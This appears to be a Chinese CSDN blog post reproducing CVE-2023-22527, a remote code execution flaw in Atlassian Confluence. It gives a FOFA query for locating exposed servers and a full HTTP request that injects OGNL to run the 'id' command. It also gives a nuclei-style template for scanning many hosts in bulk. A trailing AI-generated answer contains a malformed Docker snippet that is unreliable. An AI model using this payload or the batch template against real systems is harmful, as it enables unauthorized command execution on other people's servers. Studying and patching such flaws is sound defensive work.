漏洞复现--Confluence远程代码执行漏洞(CVE-2023-22527)

最新推荐文章于 2024-08-11 21:45:05 发布
最新推荐文章于 2024-08-11 21:45:05 发布
阅读量2.5k 收藏 9
点赞数 9
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/135768077
版权
本文报告了AtlassianConfluence中的一个远程代码执行漏洞(CVE-2023-22527),攻击者无需登录即可构造恶意请求,可能导致代码执行。漏洞影响多个版本,提供POC和批量检测方法,强调未经授权使用可能导致严重后果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。
微步漏洞团队于近日捕获到Confluence远程代码执行漏洞(CVE-2023-22527)情报,攻击者可在无需登录的情况下,利用该漏洞构造恶意请求,导致远程代码执行。

二:漏洞影响版本

8.5.0 ≤ version ≤ 8.5.3
8.0.x,8.1.x,8.2.x,8.3.x,8.4.x

三:网络空间测绘查询

fofa:
app="Atlassian-Confluence"
image.png

四:漏洞复现

image.png

POC

POST /template/aui/text-inline.vm HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

image.png

五:批量检测

id: Confluence Remote Code Execution Vulnerability

info:
  name: Confluence Remote Code Execution Vulnerability
  author: 芝士土拨鼠
  severity: high
  description: Atlassian Confluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。CVE-2023-22527,攻击者可在无需登录的情况下,利用该漏洞构造恶意请求,导致远程代码执行。
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |-
        POST /template/aui/text-inline.vm HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Accept-Language: en-US;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
        Connection: close
        Cache-Control: max-age=0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 285

        label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - X-Cmd-Response
      - type: status
        status:
          - 200

image.png

Atlassian Confluence RCE漏洞CVE-2023-22527
weixin_43567873的博客
03-11 121
Atlassian Confluence RCE漏洞CVE-2023-22527
Atlassian Confluence存在远程代码执行漏洞CVE-2023-22527) 附POC软件
nnn2188185的博客
01-23 233
Atlassian Confluence存在远程代码执行漏洞CVE-2023-22527) 附POC软件
Atlassian Confluence 模板注入代码执行漏洞风险通告
亚信安全官方账号的博客
01-16 804
亚信安全建议受影响用户尽快采取相关安全措施。
【成功复现】Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
wuli1024的博客
01-25 1524
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。
confluence模版注入漏洞_CVE-2023-22527
网络安全。
01-24 739
Confluence是Atlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。Confluence Data Center和Confluence Server多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行
漏洞复现】Atlassian Confluence远程代码执行漏洞(CVE-2023-22527)
李火火的安全圈
01-24 1620
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行
Atlassian Confluence RCE漏洞复现(CVE-2023-22527)
0xSec
01-23 2412
Atlassian Confluence/template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷
Atlassian Confluence 远程代码执行漏洞分析(CVE-2023-22518)
hackzkaq的博客
11-09 997
由于漏洞易于利用且具有严重破坏性(导致数据丢失), 因此本文章中不会公开该漏洞的利用程序. 感兴趣的读者, 可以按照文章中的思路来复现漏洞. 请注意, 本文仅供学习目的使用.
【高危】Atlassian Confluence 远程代码执行漏洞
murphysec的博客
07-25 558
Confluence 是由 Atlassian 开发的知识管理与协同软件,通常在企业内部用作wiki系统。Confluence 7.19.8到8.2.0之前的版本中存在远程代码执行漏洞,具有登录权限的攻击者无需用户交互即可在 Confluence 服务器中执行任意命令。
漏洞复现CVE-2024-21683:Confluence远程代码执行漏洞
网络安全从业者的学习笔记
07-18 2542
Atlassian Confluence 是一款功能强大的企业协作软件,专为团队协作、知识管理和内容共享而设计。它提供了一个集中的平台,团队可以共同创建、编辑和共享文档、会议记录、项目计划以及技术文档。经过管理员身份验证的远程威胁者可构造恶意请求,利用该漏洞在受影响的实例上执行任意代码,而无需用户交互。
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)漏洞复现
qq_36334672的博客
01-25 643
Confluence 8.0到8.5.3版本之间,存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞,未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。
漏洞复现-Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
玄道的网安博客
08-11 401
1.漏洞描述是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。Atlassian Confluence的/template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷。2.影响版本Confluence Data Center和Confluence Server 8.0.x。
漏洞复现】Atlassian Confluence RCE(CVE-2023-22527)
zkaqlaoniao的博客
06-26 571
Atlassian Confluence 是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。Atlassian Confluence /template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷。
confluence统计_【漏洞预警】confluence远程代码执行漏洞(CVE-2019-3396)
weixin_30716611的博客
12-28 534
概述近日,白帽汇安全研究院监测到互联网上出现了Confluence远程代码执行漏洞Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。利用该漏洞可以读取服务器上任意文件,进而可以包含恶意文件来执行代码。可能造成敏感信息泄露,服务器被控制等严重后果。分布情况根据FOFA的数据统计,全球...
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)漏洞复现
网安君的博客
06-07 3290
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134的漏洞是一个严重的未经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian Confluence 和 Data Center 2016 服务器。成功利用允许未经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)复现
热门推荐
weixin_42489549的博客
06-29 1万+
CVE-2022-26134 Confluence远程命令执行漏洞复现
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)风险通告及POC复现
qq_18209847的博客
06-07 3179
信息安全部监测到Atlassian Confluence Server and Data Center (CVE-2022-26134)远程代码执行漏洞
安全漏洞通告】Atlassian Confluence远程代码执行漏洞方案
bocco的博客
06-07 765
安全狗应急响应中心监测到,Atlassian官方发布安全通告,披露了Confluence Server和Confluence Data Center中存在的一个远程代码执行漏洞漏洞编号CVE-2022-26134。可导致攻击者无需身份验证远程执行任意代码等危害。...
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)安全风险通告
smellycat000的专栏
01-16 853
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Atlassian Confluence 远程代码执行漏洞漏洞编号QVD-2024-2746,CVE-2023-22527公开时间2024-01-16影响量级十万级奇安信评级高危CVSS 3.1分数10.0威胁类型代码执行利用可能性高POC状态未公开在野利用状态未发现EXP状态未公开技术细节状态未公开危害描述:未经身份验证的远程攻击者可以...
CVE-2023-22527验证
最新发布
02-15
### 验证 CVE-2023-22527 漏洞的存在和影响 为了验证 Atlassian Confluence 中存在的远程代码执行漏洞 (CVE-2023-22527),可以按照以下方式操作: #### 准备工作 确保拥有合法授权来测试目标系统,未经授权的渗透测试可能违反法律。 #### 构建测试环境 建议在一个隔离环境中搭建易受攻击版本的Confluence实例。可以通过Docker镜像快速部署: ```dockerfile version: '3' services: confluence: image: vulhub/confluence:CVE-2023-22527 ports: -d ``` 这将创建一个带有已知漏洞配置的服务[^2]。 #### 利用 PoC 测试 使用公开的概念证明(PoC)脚本进行检测。这些脚本通常可以在安全研究者的GitHub仓库中找到。例如,在特定条件下发送恶意构造的数据包给受影响的应用程序接口,观察返回的结果是否符合预期的行为模式[^1]。 #### 结果分析 如果成功触发了RCE条件,则说明该站点确实存在此漏洞;反之则表明不存在或已被修补。注意记录下所有交互过程中的细节以便后续评估风险程度并采取适当措施缓解潜在威胁。 对于任何发现的安全问题都应及时通知相关方,并遵循负责任披露原则处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值